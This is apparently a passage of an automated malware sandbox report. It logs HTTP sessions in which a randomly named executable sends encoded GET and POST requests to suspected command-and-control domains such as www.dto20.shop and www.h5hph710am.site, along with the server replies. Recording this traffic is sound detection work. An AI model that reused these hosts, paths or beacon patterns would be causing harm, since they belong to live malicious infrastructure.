                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                                                                    Sep 30, 2024 19:59:27.967972040 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                                                                    Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    40192.168.2.54975246.17.172.49804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:29.437912941 CEST480OUTGET /sfat/?2Zv0=qtmpl4wh&FbuX5DnP=ndQRUSq53iSLxvb8OFWfwTz47wZn0JkOZeX5JGA9kygqb7/vKRX/BZDIVWlzOZ6s0Fqu7sJ8lUpg5mYkJBBsoyg01CQ+qYMAZnZLVb86DHwbwWbBhRFgOPvzLtNlDmufAw== HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.galaxyslot88rtp.lat
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:59:30.352081060 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 1251
                                                                                                                    date: Mon, 30 Sep 2024 17:59:30 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    platform: hostinger
                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    vary: User-Agent
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                                                                    Sep 30, 2024 19:59:30.352099895 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                                                                    Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    41192.168.2.5497533.33.130.190804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:35.541915894 CEST725OUTPOST /zlyl/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.dto20.shop
                                                                                                                    Origin: http://www.dto20.shop
                                                                                                                    Referer: http://www.dto20.shop/zlyl/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 44 6e 54 65 55 6e 38 62 51 4f 30 66 38 4b 37 51 35 63 65 37 47 50 4e 43 72 7a 47 63 5a 36 58 37 66 50 57 47 32 35 4e 45 43 58 39 6c 57 52 50 39 53 66 2f 4a 33 69 61 65 53 77 6a 4a 4e 70 32 63 45 61 4f 46 46 74 72 64 6b 38 31 73 47 69 54 38 76 76 76 50 52 59 65 55 64 33 75 70 69 6c 72 78 38 4b 69 75 78 68 4f 31 71 31 38 6b 66 46 4d 63 6e 59 59 53 6e 7a 51 79 50 52 64 34 51 77 48 79 65 75 56 77 41 43 72 79 4b 46 33 55 37 74 4a 74 77 51 2b 4d 4d 69 41 4f 59 53 34 52 71 62 44 6c 34 42 6c 59 57 61 46 30 63 7a 63 69 42 51 2f 6a 43 78 34 56 57 51 39 39 61 54 34 56 74 35 51 43 31 5a 51 44 79 44 45 3d
                                                                                                                    Data Ascii: FbuX5DnP=DnTeUn8bQO0f8K7Q5ce7GPNCrzGcZ6X7fPWG25NECX9lWRP9Sf/J3iaeSwjJNp2cEaOFFtrdk81sGiT8vvvPRYeUd3upilrx8KiuxhO1q18kfFMcnYYSnzQyPRd4QwHyeuVwACryKF3U7tJtwQ+MMiAOYS4RqbDl4BlYWaF0czciBQ/jCx4VWQ99aT4Vt5QC1ZQDyDE=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    42192.168.2.5497543.33.130.190804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:38.085927963 CEST745OUTPOST /zlyl/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.dto20.shop
                                                                                                                    Origin: http://www.dto20.shop
                                                                                                                    Referer: http://www.dto20.shop/zlyl/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 44 6e 54 65 55 6e 38 62 51 4f 30 66 74 61 4c 51 31 62 71 37 48 76 4e 64 75 7a 47 63 51 61 58 33 66 4f 71 47 32 35 6c 55 43 6b 4a 6c 59 56 48 39 54 62 6a 4a 79 69 61 65 61 51 6a 4d 43 4a 32 58 45 61 79 6e 46 73 58 64 6b 38 78 73 47 69 44 38 76 63 33 49 52 49 65 53 51 58 75 33 6d 6c 72 78 38 4b 69 75 78 6c 75 50 71 78 6f 6b 63 31 38 63 6c 38 45 4e 72 54 51 78 66 42 64 34 55 77 48 32 65 75 56 6f 41 44 32 66 4b 48 50 55 37 70 42 74 78 42 2b 44 62 53 42 46 48 69 35 61 75 72 32 67 69 41 35 4d 4b 62 52 33 44 77 67 6c 4a 47 53 4a 59 54 77 39 46 77 52 46 4b 41 77 69 38 4a 78 72 76 36 41 7a 73 55 53 58 4f 70 4b 34 4c 62 46 74 58 4d 51 37 73 6b 33 50 6f 36 79 66
                                                                                                                    Data Ascii: FbuX5DnP=DnTeUn8bQO0ftaLQ1bq7HvNduzGcQaX3fOqG25lUCkJlYVH9TbjJyiaeaQjMCJ2XEaynFsXdk8xsGiD8vc3IRIeSQXu3mlrx8KiuxluPqxokc18cl8ENrTQxfBd4UwH2euVoAD2fKHPU7pBtxB+DbSBFHi5aur2giA5MKbR3DwglJGSJYTw9FwRFKAwi8Jxrv6AzsUSXOpK4LbFtXMQ7sk3Po6yf


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    43192.168.2.5497553.33.130.190804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:40.629388094 CEST1762OUTPOST /zlyl/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.dto20.shop
                                                                                                                    Origin: http://www.dto20.shop
                                                                                                                    Referer: http://www.dto20.shop/zlyl/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 44 6e 54 65 55 6e 38 62 51 4f 30 66 74 61 4c 51 31 62 71 37 48 76 4e 64 75 7a 47 63 51 61 58 33 66 4f 71 47 32 35 6c 55 43 6c 78 6c 59 69 48 39 53 38 58 4a 31 69 61 65 47 41 6a 4e 43 4a 32 4f 45 65 65 6a 46 73 61 67 6b 2b 35 73 48 45 50 38 70 70 44 49 61 49 65 53 5a 33 75 71 69 6c 72 6b 38 4c 50 6e 78 68 4b 50 71 78 6f 6b 63 33 6b 63 32 49 59 4e 70 54 51 79 50 52 64 30 51 77 48 65 65 75 39 53 41 44 6a 69 4a 30 48 55 37 49 39 74 32 7a 57 44 5a 79 42 48 45 69 35 4a 75 72 71 72 69 41 6c 36 4b 61 55 63 44 77 49 6c 59 77 4b 55 48 53 59 30 52 54 42 48 46 7a 6b 6c 75 66 35 74 6d 35 6c 42 6a 47 2b 48 48 72 4b 68 63 63 59 71 5a 74 31 58 7a 56 6a 69 34 73 6a 54 33 4a 54 6c 31 54 2f 53 34 45 4c 63 4b 33 56 50 7a 43 4a 50 62 6e 57 55 59 2b 31 69 76 68 4b 41 35 67 33 6b 65 45 4d 75 63 6c 54 77 78 51 36 76 49 75 71 6f 43 33 74 73 43 2b 55 42 65 42 37 69 74 76 58 68 71 79 51 6c 4d 6b 67 39 6c 6d 5a 4d 48 59 4d 63 42 76 4a 6f 50 31 62 74 51 34 51 55 6c 4c 55 78 4b 33 4f 37 4a 74 61 46 66 [TRUNCATED]
                                                                                                                    Data Ascii: FbuX5DnP=DnTeUn8bQO0ftaLQ1bq7HvNduzGcQaX3fOqG25lUClxlYiH9S8XJ1iaeGAjNCJ2OEeejFsagk+5sHEP8ppDIaIeSZ3uqilrk8LPnxhKPqxokc3kc2IYNpTQyPRd0QwHeeu9SADjiJ0HU7I9t2zWDZyBHEi5JurqriAl6KaUcDwIlYwKUHSY0RTBHFzkluf5tm5lBjG+HHrKhccYqZt1XzVji4sjT3JTl1T/S4ELcK3VPzCJPbnWUY+1ivhKA5g3keEMuclTwxQ6vIuqoC3tsC+UBeB7itvXhqyQlMkg9lmZMHYMcBvJoP1btQ4QUlLUxK3O7JtaFfEyM5n1kEX9eZYfPGfx4OXMaXeIWL0yuOnzRSVgqpJWgzcylDT0SnKEqEO2ZOasMh8IsJl1QtxFiAbyTQILo4Fwco3R2yd71gqW0Sbb6Wz/vbxl8m7MrGhyaojG9O9veC+u9+l0flV8mbqs/+6O/Z0PQvq3KaBwVXl66XDR06h2Oix3D7SrS/joJ/dHtwz1wQmBtbuB/jcMZ6KZKvFqHEJ7qcAjzZUSx9uFMVamEEKjs105+9FVVbwJqkJE0GVMENjrTK+74YsN+L5EcGWubWoj12P3LG94XGMXUM1P6spnlmdfKxCWOMhOZQiQ+TNZognCtRQ0T53pTZRbGF4GgHNIVOAQmzbBNU0LY7T31jAs3XtDWsL6K0z229sWf2Xiz3R0gXpjhTHst4So6v3CAq+xQomeODFfeBT96BGITRXEd+aEHFdiia4UbaXZpyJx5Ji7A3HmFq0eVWsWoY/Pzv7Wr6XgVALdSbybTA9LuFUZbG7Z5Jwkpa5XuWyjvSnvvLkRPEL/zfYy2bNRdxGv31hvmZ+vXI58D2vtzelo+NJWFpkccQVhjhr2FhxVucN2gqPi8CTNhWaYtkgwCgaGFJiSpG9Ofl1XGDk+Yrc4y6gUztLOUpre3sE+vX9zC3M+4Eo891H4+0wBHail366cVEJsAAvMm8ivfqtC [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    44192.168.2.5497563.33.130.190804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:43.170650005 CEST471OUTGET /zlyl/?FbuX5DnP=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.dto20.shop
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:59:43.856339931 CEST410INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:43 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 270
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 62 75 58 35 44 6e 50 3d 4f 6c 37 2b 58 52 39 62 65 2b 30 70 36 5a 76 43 39 71 4b 56 45 76 30 48 6a 30 54 47 61 62 2b 4b 52 2b 32 76 31 74 38 47 43 6e 46 61 41 67 33 64 65 63 2f 30 30 32 4b 69 59 6a 2f 61 45 75 65 63 47 4c 43 6d 56 74 71 42 7a 66 55 79 48 68 58 69 70 65 32 31 55 4b 6d 59 53 31 32 41 76 53 4c 55 36 75 75 48 2f 68 71 58 39 77 63 41 4d 32 30 66 6d 70 59 6f 75 68 73 59 58 6a 56 76 59 44 47 4b 62 77 3d 3d 26 32 5a 76 30 3d 71 74 6d 70 6c 34 77 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FbuX5DnP=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&2Zv0=qtmpl4wh"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    45192.168.2.549757144.34.186.85804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:48.907529116 CEST740OUTPOST /ni9w/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.h5hph710am.site
                                                                                                                    Origin: http://www.h5hph710am.site
                                                                                                                    Referer: http://www.h5hph710am.site/ni9w/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 78 54 79 79 6e 4e 4d 6f 31 49 53 70 35 61 6f 42 6d 78 39 34 79 73 54 33 54 69 73 67 46 62 2b 41 2b 6a 35 4d 48 50 32 72 6e 62 77 48 61 70 30 43 69 42 7a 55 33 2b 77 41 51 69 36 69 39 74 31 67 51 4c 68 55 6e 64 74 50 7a 75 6b 41 4f 33 67 42 49 67 30 69 4b 4a 34 38 53 56 44 45 31 4d 32 63 30 57 64 6f 75 44 42 52 4f 54 51 56 2f 77 30 6d 39 4f 39 71 44 44 6f 41 31 78 76 6f 36 53 70 63 70 6d 5a 6a 70 48 6a 68 70 78 68 50 48 6f 57 64 4e 48 6f 6d 39 44 4a 38 62 2b 66 61 34 72 73 77 54 4b 6a 79 45 68 36 54 6b 4f 68 61 37 4b 6b 71 2b 5a 56 43 6d 58 46 77 48 63 70 52 2f 55 43 74 61 53 37 4b 74 56 73 3d
                                                                                                                    Data Ascii: FbuX5DnP=xTyynNMo1ISp5aoBmx94ysT3TisgFb+A+j5MHP2rnbwHap0CiBzU3+wAQi6i9t1gQLhUndtPzukAO3gBIg0iKJ48SVDE1M2c0WdouDBROTQV/w0m9O9qDDoA1xvo6SpcpmZjpHjhpxhPHoWdNHom9DJ8b+fa4rswTKjyEh6TkOha7Kkq+ZVCmXFwHcpR/UCtaS7KtVs=
                                                                                                                    Sep 30, 2024 19:59:49.465857983 CEST720INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.0
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:49 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 555
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    46192.168.2.549758144.34.186.85804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:51.457986116 CEST760OUTPOST /ni9w/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.h5hph710am.site
                                                                                                                    Origin: http://www.h5hph710am.site
                                                                                                                    Referer: http://www.h5hph710am.site/ni9w/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 78 54 79 79 6e 4e 4d 6f 31 49 53 70 32 61 59 42 67 57 70 34 6a 38 54 30 50 53 73 67 50 37 2b 4d 2b 6a 6c 4d 48 4f 79 37 6d 70 6b 48 64 4d 59 43 68 41 7a 55 30 2b 77 41 59 43 36 72 67 39 31 70 51 4c 74 71 6e 64 42 50 7a 75 77 41 4f 33 51 42 49 58 67 68 4c 5a 34 2b 4a 6c 44 38 78 4d 32 63 30 57 64 6f 75 48 70 72 4f 54 49 56 38 42 45 6d 38 76 39 72 4e 6a 6f 42 79 78 76 6f 2b 53 70 59 70 6d 59 41 70 43 36 47 70 30 74 50 48 74 71 64 4e 53 63 68 6d 54 49 35 66 2b 66 50 35 61 5a 53 65 49 66 62 5a 69 33 6c 35 76 52 38 33 63 4a 41 6b 37 64 71 31 33 70 49 58 50 68 6d 75 6b 6a 45 41 78 72 36 7a 43 34 46 6b 6c 31 6e 6c 30 5a 64 65 67 6b 63 50 4a 54 72 52 77 57 65
                                                                                                                    Data Ascii: FbuX5DnP=xTyynNMo1ISp2aYBgWp4j8T0PSsgP7+M+jlMHOy7mpkHdMYChAzU0+wAYC6rg91pQLtqndBPzuwAO3QBIXghLZ4+JlD8xM2c0WdouHprOTIV8BEm8v9rNjoByxvo+SpYpmYApC6Gp0tPHtqdNSchmTI5f+fP5aZSeIfbZi3l5vR83cJAk7dq13pIXPhmukjEAxr6zC4Fkl1nl0ZdegkcPJTrRwWe
                                                                                                                    Sep 30, 2024 19:59:52.044470072 CEST720INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.0
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:51 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 555
                                                                                                                    Connection: close
